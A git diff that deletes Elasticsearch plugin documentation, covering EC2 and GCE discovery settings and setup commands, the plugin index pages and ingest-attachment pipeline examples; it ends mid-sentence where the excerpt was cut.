For example, -to authenticate using a particular access key and secret key, add these keys to -the keystore by running the following commands: - -[source,sh] ----- -bin/elasticsearch-keystore add discovery.ec2.access_key -bin/elasticsearch-keystore add discovery.ec2.secret_key ----- - -The available settings for the EC2 discovery plugin are as follows. - -`discovery.ec2.access_key` ({ref}/secure-settings.html[Secure], {ref}/secure-settings.html#reloadable-secure-settings[reloadable]):: - - An EC2 access key. If set, you must also set `discovery.ec2.secret_key`. - If unset, `discovery-ec2` will instead use the instance role. This setting - is sensitive and must be stored in the {es} keystore. - -`discovery.ec2.secret_key` ({ref}/secure-settings.html[Secure], {ref}/secure-settings.html#reloadable-secure-settings[reloadable]):: - - An EC2 secret key. If set, you must also set `discovery.ec2.access_key`. - This setting is sensitive and must be stored in the {es} keystore. - -`discovery.ec2.session_token` ({ref}/secure-settings.html[Secure], {ref}/secure-settings.html#reloadable-secure-settings[reloadable]):: - - An EC2 session token. If set, you must also set `discovery.ec2.access_key` - and `discovery.ec2.secret_key`. This setting is sensitive and must be - stored in the {es} keystore. - -`discovery.ec2.endpoint`:: - - The EC2 service endpoint to which to connect. See - https://docs.aws.amazon.com/general/latest/gr/rande.html#ec2_region to find - the appropriate endpoint for the region. This setting defaults to - `ec2.us-east-1.amazonaws.com` which is appropriate for clusters running in - the `us-east-1` region. - -`discovery.ec2.protocol`:: - - The protocol to use to connect to the EC2 service endpoint, which may be - either `http` or `https`. Defaults to `https`. - -`discovery.ec2.proxy.host`:: - - The address or host name of an HTTP proxy through which to connect to EC2. - If not set, no proxy is used. - -`discovery.ec2.proxy.port`:: - - When the address of an HTTP proxy is given in `discovery.ec2.proxy.host`, - this setting determines the port to use to connect to the proxy. Defaults to - `80`. - -`discovery.ec2.proxy.username` ({ref}/secure-settings.html[Secure], {ref}/secure-settings.html#reloadable-secure-settings[reloadable]):: - - When the address of an HTTP proxy is given in `discovery.ec2.proxy.host`, - this setting determines the username to use to connect to the proxy. When - not set, no username is used. This setting is sensitive and must be stored - in the {es} keystore. - -`discovery.ec2.proxy.password` ({ref}/secure-settings.html[Secure], {ref}/secure-settings.html#reloadable-secure-settings[reloadable]):: - - When the address of an HTTP proxy is given in `discovery.ec2.proxy.host`, - this setting determines the password to use to connect to the proxy. When - not set, no password is used. This setting is sensitive and must be stored - in the {es} keystore. - -`discovery.ec2.read_timeout`:: - - The socket timeout for connections to EC2, - {ref}/common-options.html#time-units[including the units]. For example, a - value of `60s` specifies a 60-second timeout. Defaults to 50 seconds. - -`discovery.ec2.groups`:: - - A list of the names or IDs of the security groups to use for discovery. The - `discovery.ec2.any_group` setting determines the behaviour of this setting. - Defaults to an empty list, meaning that security group membership is - ignored by EC2 discovery. 
- -`discovery.ec2.any_group`:: - - Defaults to `true`, meaning that instances belonging to _any_ of the - security groups specified in `discovery.ec2.groups` will be used for - discovery. If set to `false`, only instances that belong to _all_ of the - security groups specified in `discovery.ec2.groups` will be used for - discovery. - -`discovery.ec2.host_type`:: - -+ --- - -Each EC2 instance has a number of different addresses that might be suitable -for discovery. This setting allows you to select which of these addresses is -used by the discovery process. It can be set to one of `private_ip`, -`public_ip`, `private_dns`, `public_dns` or `tag:TAGNAME` where `TAGNAME` -refers to a name of a tag. This setting defaults to `private_ip`. - -If you set `discovery.ec2.host_type` to a value of the form `tag:TAGNAME` then -the value of the tag `TAGNAME` attached to each instance will be used as that -instance's address for discovery. Instances which do not have this tag set will -be ignored by the discovery process. - -For example if you tag some EC2 instances with a tag named -`elasticsearch-host-name` and set `host_type: tag:elasticsearch-host-name` then -the `discovery-ec2` plugin will read each instance's host name from the value -of the `elasticsearch-host-name` tag. -https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/Using_Tags.html[Read more -about EC2 Tags]. - --- - -`discovery.ec2.availability_zones`:: - - A list of the names of the availability zones to use for discovery. The - name of an availability zone is the - https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/using-regions-availability-zones.html[region - code followed by a letter], such as `us-east-1a`. Only instances placed in - one of the given availability zones will be used for discovery. - -[[discovery-ec2-filtering]] -`discovery.ec2.tag.TAGNAME`:: - -+ --- - -A list of the values of a tag called `TAGNAME` to use for discovery. If set, -only instances that are tagged with one of the given values will be used for -discovery. For instance, the following settings will only use nodes with a -`role` tag set to `master` and an `environment` tag set to either `dev` or -`staging`. - -[source,yaml] ----- -discovery.ec2.tag.role: master -discovery.ec2.tag.environment: dev,staging ----- - -NOTE: The names of tags used for discovery may only contain ASCII letters, -numbers, hyphens and underscores. In particular you cannot use tags whose name -includes a colon. - --- - -`discovery.ec2.node_cache_time`:: - - Sets the length of time for which the collection of discovered instances is - cached. {es} waits at least this long between requests for discovery - information from the EC2 API. AWS may reject discovery requests if they are - made too often, and this would cause discovery to fail. Defaults to `10s`. - -All **secure** settings of this plugin are -{ref}/secure-settings.html#reloadable-secure-settings[reloadable], allowing you -to update the secure settings for this plugin without needing to restart each -node. - - -[[discovery-ec2-permissions]] -===== Recommended EC2 permissions - -The `discovery-ec2` plugin works by making a `DescribeInstances` call to the AWS -EC2 API. You must configure your AWS account to allow this, which is normally -done using an IAM policy. You can create a custom policy via the IAM Management -Console. It should look similar to this. 
- -[source,js] ----- -{ - "Statement": [ - { - "Action": [ - "ec2:DescribeInstances" - ], - "Effect": "Allow", - "Resource": [ - "*" - ] - } - ], - "Version": "2012-10-17" -} ----- -// NOTCONSOLE - -[[discovery-ec2-attributes]] -===== Automatic node attributes - -The `discovery-ec2` plugin can automatically set the `aws_availability_zone` -node attribute to the availability zone of each node. This node attribute -allows you to ensure that each shard has copies allocated redundantly across -multiple availability zones by using the -{ref}/modules-cluster.html#shard-allocation-awareness[Allocation Awareness] -feature. - -In order to enable the automatic definition of the `aws_availability_zone` -attribute, set `cloud.node.auto_attributes` to `true`. For example: - -[source,yaml] ----- -cloud.node.auto_attributes: true -cluster.routing.allocation.awareness.attributes: aws_availability_zone ----- - -The `aws_availability_zone` attribute can be automatically set like this when -using any discovery type. It is not necessary to set `discovery.seed_providers: -ec2`. However this feature does require that the `discovery-ec2` plugin is -installed. - -[[discovery-ec2-network-host]] -===== Binding to the correct address - -It is important to define `network.host` correctly when deploying a cluster on -EC2. By default each {es} node only binds to `localhost`, which will prevent it -from being discovered by nodes running on any other instances. - -You can use the {ref}/modules-network.html[core network host settings] to bind -each node to the desired address, or you can set `network.host` to one of the -following EC2-specific settings provided by the `discovery-ec2` plugin: - -[cols="<,<",options="header",] -|================================================================== -|EC2 Host Value |Description -|`_ec2:privateIpv4_` |The private IP address (ipv4) of the machine. -|`_ec2:privateDns_` |The private host of the machine. -|`_ec2:publicIpv4_` |The public IP address (ipv4) of the machine. -|`_ec2:publicDns_` |The public host of the machine. -|`_ec2:privateIp_` |Equivalent to `_ec2:privateIpv4_`. -|`_ec2:publicIp_` |Equivalent to `_ec2:publicIpv4_`. -|`_ec2_` |Equivalent to `_ec2:privateIpv4_`. -|================================================================== - -These values are acceptable when using any discovery type. They do not require -you to set `discovery.seed_providers: ec2`. However they do require that the -`discovery-ec2` plugin is installed. - -[[cloud-aws-best-practices]] -==== Best Practices in AWS - -This section contains some other information about designing and managing an -{es} cluster on your own AWS infrastructure. If you would prefer to avoid these -operational details then you may be interested in a hosted {es} installation -available on AWS-based infrastructure from https://www.elastic.co/cloud. - -===== Storage - -EC2 instances offer a number of different kinds of storage. Please be aware of -the following when selecting the storage for your cluster: - -* https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/InstanceStorage.html[Instance -Store] is recommended for {es} clusters as it offers excellent performance and -is cheaper than EBS-based storage. {es} is designed to work well with this kind -of ephemeral storage because it replicates each shard across multiple nodes. If -a node fails and its Instance Store is lost then {es} will rebuild any lost -shards from other copies. 
- -* https://aws.amazon.com/ebs/[EBS-based storage] may be acceptable -for smaller clusters (1-2 nodes). Be sure to use provisioned IOPS to ensure -your cluster has satisfactory performance. - -* https://aws.amazon.com/efs/[EFS-based storage] is not -recommended or supported as it does not offer satisfactory performance. -Historically, shared network filesystems such as EFS have not always offered -precisely the behaviour that {es} requires of its filesystem, and this has been -known to lead to index corruption. Although EFS offers durability, shared -storage, and the ability to grow and shrink filesystems dynamically, you can -achieve the same benefits using {es} directly. - -===== Choice of AMI - -Prefer the https://aws.amazon.com/amazon-linux-2/[Amazon Linux 2 AMIs] as these -allow you to benefit from the lightweight nature, support, and EC2-specific -performance enhancements that these images offer. - -===== Networking - -* Smaller instance types have limited network performance, in terms of both -https://lab.getbase.com/how-we-discovered-limitations-on-the-aws-tcp-stack/[bandwidth -and number of connections]. If networking is a bottleneck, avoid -https://aws.amazon.com/ec2/instance-types/[instance types] with networking -labelled as `Moderate` or `Low`. - -* It is a good idea to distribute your nodes across multiple -https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/using-regions-availability-zones.html[availability -zones] and use {ref}/modules-cluster.html#shard-allocation-awareness[shard -allocation awareness] to ensure that each shard has copies in more than one -availability zone. - -* Do not span a cluster across regions. {es} expects that node-to-node -connections within a cluster are reasonably reliable and offer high bandwidth -and low latency, and these properties do not hold for connections between -regions. Although an {es} cluster will behave correctly when node-to-node -connections are unreliable or slow, it is not optimised for this case and its -performance may suffer. If you wish to geographically distribute your data, you -should provision multiple clusters and use features such as -{ref}/modules-cross-cluster-search.html[cross-cluster search] and -{ref}/xpack-ccr.html[cross-cluster replication]. - -===== Other recommendations - -* If you have split your nodes into roles, consider -https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/Using_Tags.html[tagging the -EC2 instances] by role to make it easier to filter and view your EC2 instances -in the AWS console. - -* Consider -https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/terminating-instances.html#Using_ChangingDisableAPITermination[enabling -termination protection] for all of your data and master-eligible nodes. This -will help to prevent accidental termination of these nodes which could -temporarily reduce the resilience of the cluster and which could cause a -potentially disruptive reallocation of shards. - -* If running your cluster using one or more -https://docs.aws.amazon.com/autoscaling/ec2/userguide/AutoScalingGroup.html[auto-scaling -groups], consider protecting your data and master-eligible nodes -https://docs.aws.amazon.com/autoscaling/ec2/userguide/as-instance-termination.html#instance-protection-instance[against -termination during scale-in]. This will help to prevent automatic termination -of these nodes which could temporarily reduce the resilience of the cluster and -which could cause a potentially disruptive reallocation of shards. 
If these -instances are protected against termination during scale-in then you can use -{ref}/shard-allocation-filtering.html[shard allocation filtering] to gracefully -migrate any data off these nodes before terminating them manually. diff --git a/docs/plugins/discovery-gce.asciidoc b/docs/plugins/discovery-gce.asciidoc deleted file mode 100644 index 199523db901..00000000000 --- a/docs/plugins/discovery-gce.asciidoc +++ /dev/null @@ -1,488 +0,0 @@ -[[discovery-gce]] -=== GCE Discovery Plugin - -The Google Compute Engine Discovery plugin uses the GCE API to identify the -addresses of seed hosts. - -:plugin_name: discovery-gce -include::install_remove.asciidoc[] - -[[discovery-gce-usage]] -==== GCE Virtual Machine Discovery - -Google Compute Engine VM discovery allows to use the google APIs to perform -automatic discovery of seed hosts. Here is a simple sample configuration: - -[source,yaml] --------------------------------------------------- -cloud: - gce: - project_id: - zone: -discovery: - seed_providers: gce --------------------------------------------------- - -The following gce settings (prefixed with `cloud.gce`) are supported: - - `project_id`:: - - Your Google project id. - By default the project id will be derived from the instance metadata. - - Note: Deriving the project id from system properties or environment variables - (`GOOGLE_CLOUD_PROJECT` or `GCLOUD_PROJECT`) is not supported. - - `zone`:: - - helps to retrieve instances running in a given zone. - It should be one of the https://developers.google.com/compute/docs/zones#available[GCE supported zones]. - By default the zone will be derived from the instance metadata. - See also <>. - - `retry`:: - - If set to `true`, client will use - https://developers.google.com/api-client-library/java/google-http-java-client/backoff[ExponentialBackOff] - policy to retry the failed http request. Defaults to `true`. - - `max_wait`:: - - The maximum elapsed time after the client instantiating retry. If the time elapsed goes past the - `max_wait`, client stops to retry. A negative value means that it will wait indefinitely. Defaults to `0s` (retry - indefinitely). - - `refresh_interval`:: - - How long the list of hosts is cached to prevent further requests to the GCE API. `0s` disables caching. - A negative value will cause infinite caching. Defaults to `0s`. - - -[IMPORTANT] -.Binding the network host -============================================== - -It's important to define `network.host` as by default it's bound to `localhost`. - -You can use {ref}/modules-network.html[core network host settings] or -<>: - -============================================== - -[[discovery-gce-network-host]] -==== GCE Network Host - -When the `discovery-gce` plugin is installed, the following are also allowed -as valid network host settings: - -[cols="<,<",options="header",] -|================================================================== -|GCE Host Value |Description -|`_gce:privateIp:X_` |The private IP address of the machine for a given network interface. -|`_gce:hostname_` |The hostname of the machine. -|`_gce_` |Same as `_gce:privateIp:0_` (recommended). 
-|================================================================== - -Examples: - -[source,yaml] --------------------------------------------------- -# get the IP address from network interface 1 -network.host: _gce:privateIp:1_ -# Using GCE internal hostname -network.host: _gce:hostname_ -# shortcut for _gce:privateIp:0_ (recommended) -network.host: _gce_ --------------------------------------------------- - -[[discovery-gce-usage-short]] -===== How to start (short story) - -* Create Google Compute Engine instance (with compute rw permissions) -* Install Elasticsearch -* Install Google Compute Engine Cloud plugin -* Modify `elasticsearch.yml` file -* Start Elasticsearch - -[[discovery-gce-usage-long]] -==== Setting up GCE Discovery - - -[[discovery-gce-usage-long-prerequisites]] -===== Prerequisites - -Before starting, you need: - -* Your project ID, e.g. `es-cloud`. Get it from https://code.google.com/apis/console/[Google API Console]. -* To install https://developers.google.com/cloud/sdk/[Google Cloud SDK] - -If you did not set it yet, you can define your default project you will work on: - -[source,sh] --------------------------------------------------- -gcloud config set project es-cloud --------------------------------------------------- - -[[discovery-gce-usage-long-login]] -===== Login to Google Cloud - -If you haven't already, login to Google Cloud - -[source,sh] --------------------------------------------------- -gcloud auth login --------------------------------------------------- - -This will open your browser. You will be asked to sign-in to a Google account and -authorize access to the Google Cloud SDK. - -[[discovery-gce-usage-long-first-instance]] -===== Creating your first instance - - -[source,sh] --------------------------------------------------- -gcloud compute instances create myesnode1 \ - --zone \ - --scopes compute-rw --------------------------------------------------- - -When done, a report like this one should appears: - -[source,text] --------------------------------------------------- -Created [https://www.googleapis.com/compute/v1/projects/es-cloud-1070/zones/us-central1-f/instances/myesnode1]. -NAME ZONE MACHINE_TYPE PREEMPTIBLE INTERNAL_IP EXTERNAL_IP STATUS -myesnode1 us-central1-f n1-standard-1 10.240.133.54 104.197.94.25 RUNNING --------------------------------------------------- - -You can now connect to your instance: - -[source,sh] --------------------------------------------------- -# Connect using google cloud SDK -gcloud compute ssh myesnode1 --zone europe-west1-a - -# Or using SSH with external IP address -ssh -i ~/.ssh/google_compute_engine 192.158.29.199 --------------------------------------------------- - -[IMPORTANT] -.Service Account Permissions -============================================== - -It's important when creating an instance that the correct permissions are set. At a minimum, you must ensure you have: - -[source,text] --------------------------------------------------- -scopes=compute-rw --------------------------------------------------- - -Failing to set this will result in unauthorized messages when starting Elasticsearch. -See <>. 
-============================================== - -Once connected, {stack-gs}/get-started-elastic-stack.html#install-elasticsearch[install {es}]: - -[[discovery-gce-usage-long-install-plugin]] -===== Install Elasticsearch discovery gce plugin - -Install the plugin: - -[source,sh] --------------------------------------------------- -# Use Plugin Manager to install it -sudo bin/elasticsearch-plugin install discovery-gce --------------------------------------------------- - -Open the `elasticsearch.yml` file: - -[source,sh] --------------------------------------------------- -sudo vi /etc/elasticsearch/elasticsearch.yml --------------------------------------------------- - -And add the following lines: - -[source,yaml] --------------------------------------------------- -cloud: - gce: - project_id: es-cloud - zone: europe-west1-a -discovery: - seed_providers: gce --------------------------------------------------- - - -Start Elasticsearch: - -[source,sh] --------------------------------------------------- -sudo /etc/init.d/elasticsearch start --------------------------------------------------- - -If anything goes wrong, you should check logs: - -[source,sh] --------------------------------------------------- -tail -f /var/log/elasticsearch/elasticsearch.log --------------------------------------------------- - -If needed, you can change log level to `trace` by opening `log4j2.properties`: - -[source,sh] --------------------------------------------------- -sudo vi /etc/elasticsearch/log4j2.properties --------------------------------------------------- - -and adding the following line: - -[source,yaml] --------------------------------------------------- -# discovery -logger.discovery_gce.name = discovery.gce -logger.discovery_gce.level = trace --------------------------------------------------- - - - -[[discovery-gce-usage-cloning]] -==== Cloning your existing machine - -In order to build a cluster on many nodes, you can clone your configured instance to new nodes. -You won't have to reinstall everything! - -First create an image of your running instance and upload it to Google Cloud Storage: - -[source,sh] --------------------------------------------------- -# Create an image of your current instance -sudo /usr/bin/gcimagebundle -d /dev/sda -o /tmp/ - -# An image has been created in `/tmp` directory: -ls /tmp -e4686d7f5bf904a924ae0cfeb58d0827c6d5b966.image.tar.gz - -# Upload your image to Google Cloud Storage: -# Create a bucket to hold your image, let's say `esimage`: -gsutil mb gs://esimage - -# Copy your image to this bucket: -gsutil cp /tmp/e4686d7f5bf904a924ae0cfeb58d0827c6d5b966.image.tar.gz gs://esimage - -# Then add your image to images collection: -gcloud compute images create elasticsearch-2-0-0 --source-uri gs://esimage/e4686d7f5bf904a924ae0cfeb58d0827c6d5b966.image.tar.gz - -# If the previous command did not work for you, logout from your instance -# and launch the same command from your local machine. 
--------------------------------------------------- - -[[discovery-gce-usage-start-new-instances]] -===== Start new instances - -As you have now an image, you can create as many instances as you need: - -[source,sh] --------------------------------------------------- -# Just change node name (here myesnode2) -gcloud compute instances create myesnode2 --image elasticsearch-2-0-0 --zone europe-west1-a - -# If you want to provide all details directly, you can use: -gcloud compute instances create myesnode2 --image=elasticsearch-2-0-0 \ - --zone europe-west1-a --machine-type f1-micro --scopes=compute-rw --------------------------------------------------- - -[[discovery-gce-usage-remove-instance]] -===== Remove an instance (aka shut it down) - -You can use https://cloud.google.com/console[Google Cloud Console] or CLI to manage your instances: - -[source,sh] --------------------------------------------------- -# Stopping and removing instances -gcloud compute instances delete myesnode1 myesnode2 \ - --zone=europe-west1-a - -# Consider removing disk as well if you don't need them anymore -gcloud compute disks delete boot-myesnode1 boot-myesnode2 \ - --zone=europe-west1-a --------------------------------------------------- - -[[discovery-gce-usage-zones]] -==== Using GCE zones - -`cloud.gce.zone` helps to retrieve instances running in a given zone. It should be one of the -https://developers.google.com/compute/docs/zones#available[GCE supported zones]. - -The GCE discovery can support multi zones although you need to be aware of network latency between zones. -To enable discovery across more than one zone, just enter add your zone list to `cloud.gce.zone` setting: - -[source,yaml] --------------------------------------------------- -cloud: - gce: - project_id: - zone: ["", ""] -discovery: - seed_providers: gce --------------------------------------------------- - - - -[[discovery-gce-usage-tags]] -==== Filtering by tags - -The GCE discovery can also filter machines to include in the cluster based on tags using `discovery.gce.tags` settings. -For example, setting `discovery.gce.tags` to `dev` will only filter instances having a tag set to `dev`. Several tags -set will require all of those tags to be set for the instance to be included. - -One practical use for tag filtering is when a GCE cluster contains many nodes -that are not master-eligible {es} nodes. In this case, tagging the GCE -instances that _are_ running the master-eligible {es} nodes, and then filtering -by that tag, will help discovery to run more efficiently. - -Add your tag when building the new instance: - -[source,sh] --------------------------------------------------- -gcloud compute instances create myesnode1 --project=es-cloud \ - --scopes=compute-rw \ - --tags=elasticsearch,dev --------------------------------------------------- - -Then, define it in `elasticsearch.yml`: - -[source,yaml] --------------------------------------------------- -cloud: - gce: - project_id: es-cloud - zone: europe-west1-a -discovery: - seed_providers: gce - gce: - tags: elasticsearch, dev --------------------------------------------------- - -[[discovery-gce-usage-port]] -==== Changing default transport port - -By default, Elasticsearch GCE plugin assumes that you run Elasticsearch on 9300 default port. 
-However, you can specify the port that Elasticsearch should use through the Google Compute Engine metadata key `es_port`:
-
-[[discovery-gce-usage-port-create]]
-===== When creating an instance
-
-Add the `--metadata es_port=9301` option:
-
-[source,sh]
---------------------------------------------------
-# when creating the first instance
-gcloud compute instances create myesnode1 \
-  --scopes=compute-rw,storage-full \
-  --metadata es_port=9301
-
-# when creating an instance from an image
-gcloud compute instances create myesnode2 --image=elasticsearch-1-0-0-RC1 \
-  --zone europe-west1-a --machine-type f1-micro --scopes=compute-rw \
-  --metadata es_port=9301
---------------------------------------------------
-
-[[discovery-gce-usage-port-run]]
-===== On a running instance
-
-[source,sh]
---------------------------------------------------
-gcloud compute instances add-metadata myesnode1 \
-  --zone europe-west1-a \
-  --metadata es_port=9301
---------------------------------------------------
-
-
-[[discovery-gce-usage-tips]]
-==== GCE Tips
-
-[[discovery-gce-usage-tips-projectid]]
-===== Store project ID locally
-
-If you don't want to repeat the project ID each time, you can save it in the local gcloud config:
-
-[source,sh]
---------------------------------------------------
-gcloud config set project es-cloud
---------------------------------------------------
-
-[[discovery-gce-usage-tips-permissions]]
-===== Machine Permissions
-
-If you have created a machine without the correct permissions, you will see `403 unauthorized` error messages. To change the permissions of an existing instance, first stop the instance, then edit it and scroll down to `Access Scopes` to change the permission. Alternatively, delete the instance (but NOT the disk) and create a new one with the correct permissions.
-
-Creating machines with gcloud::
-+
---
-Ensure the following flags are set:
-
-[source,text]
---------------------------------------------------
---scopes=compute-rw
---------------------------------------------------
---
-
-Creating with console (web)::
-+
---
-When creating an instance using the web portal, click _Show advanced options_.
-
-At the bottom of the page, under `PROJECT ACCESS`, choose `>> Compute >> Read Write`.
---
-
-Creating with knife google::
-+
---
-Set the service account scopes when creating the machine:
-
-[source,sh]
---------------------------------------------------
-knife google server create www1 \
-    -m n1-standard-1 \
-    -I debian-8 \
-    -Z us-central1-a \
-    -i ~/.ssh/id_rsa \
-    -x jdoe \
-    --gce-service-account-scopes https://www.googleapis.com/auth/compute.full_control
---------------------------------------------------
-
-Or, you may use the alias:
-
-[source,sh]
---------------------------------------------------
- --gce-service-account-scopes compute-rw
---------------------------------------------------
---
-
-[[discovery-gce-usage-testing]]
-==== Testing GCE
-
-Integration tests in this plugin require a working GCE configuration and are
-therefore disabled by default. To enable them, prepare a config file
-`elasticsearch.yml` with the following content:
-
-[source,yaml]
---------------------------------------------------
-cloud:
-  gce:
-      project_id: es-cloud
-      zone: europe-west1-a
-discovery:
-      seed_providers: gce
---------------------------------------------------
-
-Replace `project_id` and `zone` with your settings.
- -To run test: - -[source,sh] --------------------------------------------------- -mvn -Dtests.gce=true -Dtests.config=/path/to/config/file/elasticsearch.yml clean test --------------------------------------------------- diff --git a/docs/plugins/discovery.asciidoc b/docs/plugins/discovery.asciidoc deleted file mode 100644 index 100373c50b8..00000000000 --- a/docs/plugins/discovery.asciidoc +++ /dev/null @@ -1,39 +0,0 @@ -[[discovery]] -== Discovery Plugins - -Discovery plugins extend Elasticsearch by adding new seed hosts providers that -can be used to extend the {ref}/modules-discovery.html[cluster formation -module]. - -[discrete] -==== Core discovery plugins - -The core discovery plugins are: - -<>:: - -The EC2 discovery plugin uses the https://github.com/aws/aws-sdk-java[AWS API] -to identify the addresses of seed hosts. - -<>:: - -The Azure Classic discovery plugin uses the Azure Classic API to identify the -addresses of seed hosts. - -<>:: - -The Google Compute Engine discovery plugin uses the GCE API to identify the -addresses of seed hosts. - -[discrete] -==== Community contributed discovery plugins - -The following discovery plugins have been contributed by our community: - -* https://github.com/fabric8io/elasticsearch-cloud-kubernetes[Kubernetes Discovery Plugin] (by Jimmi Dyson, https://fabric8.io[fabric8]) - -include::discovery-ec2.asciidoc[] - -include::discovery-azure-classic.asciidoc[] - -include::discovery-gce.asciidoc[] diff --git a/docs/plugins/index.asciidoc b/docs/plugins/index.asciidoc deleted file mode 100644 index 4d51ff147d7..00000000000 --- a/docs/plugins/index.asciidoc +++ /dev/null @@ -1,65 +0,0 @@ -= Elasticsearch Plugins and Integrations - -include::../Versions.asciidoc[] - -[[intro]] -== Introduction to plugins - -Plugins are a way to enhance the core Elasticsearch functionality in a custom -manner. They range from adding custom mapping types, custom analyzers, native -scripts, custom discovery and more. - -Plugins contain JAR files, but may also contain scripts and config files, and -must be installed on every node in the cluster. After installation, each -node must be restarted before the plugin becomes visible. - -NOTE: A full cluster restart is required for installing plugins that have -custom cluster state metadata, such as X-Pack. It is still possible to upgrade -such plugins with a rolling restart. - -This documentation distinguishes two categories of plugins: - -Core Plugins:: This category identifies plugins that are part of Elasticsearch -project. Delivered at the same time as Elasticsearch, their version number always -matches the version number of Elasticsearch itself. These plugins are maintained -by the Elastic team with the appreciated help of amazing community members (for -open source plugins). Issues and bug reports can be reported on the -https://github.com/elastic/elasticsearch[Github project page]. - -Community contributed:: This category identifies plugins that are external to -the Elasticsearch project. They are provided by individual developers or private -companies and have their own licenses as well as their own versioning system. -Issues and bug reports can usually be reported on the community plugin's web site. - -For advice on writing your own plugin, see <>. - -IMPORTANT: Site plugins -- plugins containing HTML, CSS and JavaScript -- are -no longer supported. 
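-
-Because a plugin only becomes visible after it has been installed on every
-node and each node has been restarted, it can be useful to verify the rollout
-afterwards. The following is a minimal sketch of one way to do this, assuming
-an unsecured cluster reachable at `http://localhost:9200`; `analysis-icu` is
-used purely as an example plugin name:
-
-[source,python]
---------------------------------------------------
-# List the plugins reported by each node via the nodes info API and flag
-# nodes that are missing the expected plugin.
-import requests
-
-EXPECTED_PLUGIN = "analysis-icu"  # example plugin name, adjust as needed
-
-resp = requests.get("http://localhost:9200/_nodes/plugins")
-resp.raise_for_status()
-
-for node in resp.json()["nodes"].values():
-    installed = {p["name"] for p in node["plugins"]}
-    status = "ok" if EXPECTED_PLUGIN in installed else "MISSING"
-    print(f"{node['name']}: {status} ({', '.join(sorted(installed)) or 'no plugins'})")
---------------------------------------------------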
- -include::plugin-script.asciidoc[] - -include::api.asciidoc[] - -include::alerting.asciidoc[] - -include::analysis.asciidoc[] - -include::discovery.asciidoc[] - -include::ingest.asciidoc[] - -include::management.asciidoc[] - -include::mapper.asciidoc[] - -include::security.asciidoc[] - -include::repository.asciidoc[] - -include::store.asciidoc[] - -include::integrations.asciidoc[] - -include::authors.asciidoc[] - -include::redirects.asciidoc[] diff --git a/docs/plugins/ingest-attachment.asciidoc b/docs/plugins/ingest-attachment.asciidoc deleted file mode 100644 index 901bc19974f..00000000000 --- a/docs/plugins/ingest-attachment.asciidoc +++ /dev/null @@ -1,390 +0,0 @@ -[[ingest-attachment]] -=== Ingest Attachment Processor Plugin - -The ingest attachment plugin lets Elasticsearch extract file attachments in common formats (such as PPT, XLS, and PDF) by -using the Apache text extraction library https://tika.apache.org/[Tika]. - -You can use the ingest attachment plugin as a replacement for the mapper attachment plugin. - -The source field must be a base64 encoded binary. If you do not want to incur -the overhead of converting back and forth between base64, you can use the CBOR -format instead of JSON and specify the field as a bytes array instead of a string -representation. The processor will skip the base64 decoding then. - -:plugin_name: ingest-attachment -include::install_remove.asciidoc[] - -[[using-ingest-attachment]] -==== Using the Attachment Processor in a Pipeline - -[[ingest-attachment-options]] -.Attachment options -[options="header"] -|====== -| Name | Required | Default | Description -| `field` | yes | - | The field to get the base64 encoded field from -| `target_field` | no | attachment | The field that will hold the attachment information -| `indexed_chars` | no | 100000 | The number of chars being used for extraction to prevent huge fields. Use `-1` for no limit. -| `indexed_chars_field` | no | `null` | Field name from which you can overwrite the number of chars being used for extraction. See `indexed_chars`. -| `properties` | no | all properties | Array of properties to select to be stored. Can be `content`, `title`, `name`, `author`, `keywords`, `date`, `content_type`, `content_length`, `language` -| `ignore_missing` | no | `false` | If `true` and `field` does not exist, the processor quietly exits without modifying the document -|====== - -[discrete] -[[ingest-attachment-json-ex]] -==== Example - -If attaching files to JSON documents, you must first encode the file as a base64 -string. On Unix-like systems, you can do this using a `base64` command: - -[source,shell] ----- -base64 -in myfile.rtf ----- - -The command returns the base64-encoded string for the file. The following base64 -string is for an `.rtf` file containing the text `Lorem ipsum dolor sit amet`: -`e1xydGYxXGFuc2kNCkxvcmVtIGlwc3VtIGRvbG9yIHNpdCBhbWV0DQpccGFyIH0=`. 
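-
-If you are indexing from code rather than from the command line, the same
-base64 string can be produced with the Python standard library. A minimal
-sketch (the file name is the same example file used above):
-
-[source,python]
---------------------------------------------------
-# Base64-encode a file so it can be sent through the attachment pipeline.
-import base64
-
-with open("myfile.rtf", "rb") as f:
-    encoded = base64.b64encode(f.read()).decode("ascii")
-
-# The encoded string goes into the field read by the attachment processor.
-doc = {"data": encoded}
-print(doc)
---------------------------------------------------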
- -Use an attachment processor to decode the string and extract the file's -properties: - -[source,console] ----- -PUT _ingest/pipeline/attachment -{ - "description" : "Extract attachment information", - "processors" : [ - { - "attachment" : { - "field" : "data" - } - } - ] -} -PUT my-index-000001/_doc/my_id?pipeline=attachment -{ - "data": "e1xydGYxXGFuc2kNCkxvcmVtIGlwc3VtIGRvbG9yIHNpdCBhbWV0DQpccGFyIH0=" -} -GET my-index-000001/_doc/my_id ----- - -The document's `attachment` object contains extracted properties for the file: - -[source,console-result] ----- -{ - "found": true, - "_index": "my-index-000001", - "_type": "_doc", - "_id": "my_id", - "_version": 1, - "_seq_no": 22, - "_primary_term": 1, - "_source": { - "data": "e1xydGYxXGFuc2kNCkxvcmVtIGlwc3VtIGRvbG9yIHNpdCBhbWV0DQpccGFyIH0=", - "attachment": { - "content_type": "application/rtf", - "language": "ro", - "content": "Lorem ipsum dolor sit amet", - "content_length": 28 - } - } -} ----- -// TESTRESPONSE[s/"_seq_no": \d+/"_seq_no" : $body._seq_no/ s/"_primary_term" : 1/"_primary_term" : $body._primary_term/] - -To extract only certain `attachment` fields, specify the `properties` array: - -[source,console] ----- -PUT _ingest/pipeline/attachment -{ - "description" : "Extract attachment information", - "processors" : [ - { - "attachment" : { - "field" : "data", - "properties": [ "content", "title" ] - } - } - ] -} ----- - -NOTE: Extracting contents from binary data is a resource intensive operation and - consumes a lot of resources. It is highly recommended to run pipelines - using this processor in a dedicated ingest node. - -[[ingest-attachment-cbor]] -==== Use the attachment processor with CBOR - -To avoid encoding and decoding JSON to base64, you can instead pass CBOR data to -the attachment processor. For example, the following request creates the -`cbor-attachment` pipeline, which uses the attachment processor. - -[source,console] ----- -PUT _ingest/pipeline/cbor-attachment -{ - "description" : "Extract attachment information", - "processors" : [ - { - "attachment" : { - "field" : "data" - } - } - ] -} ----- - -The following Python script passes CBOR data to an HTTP indexing request that -includes the `cbor-attachment` pipeline. The HTTP 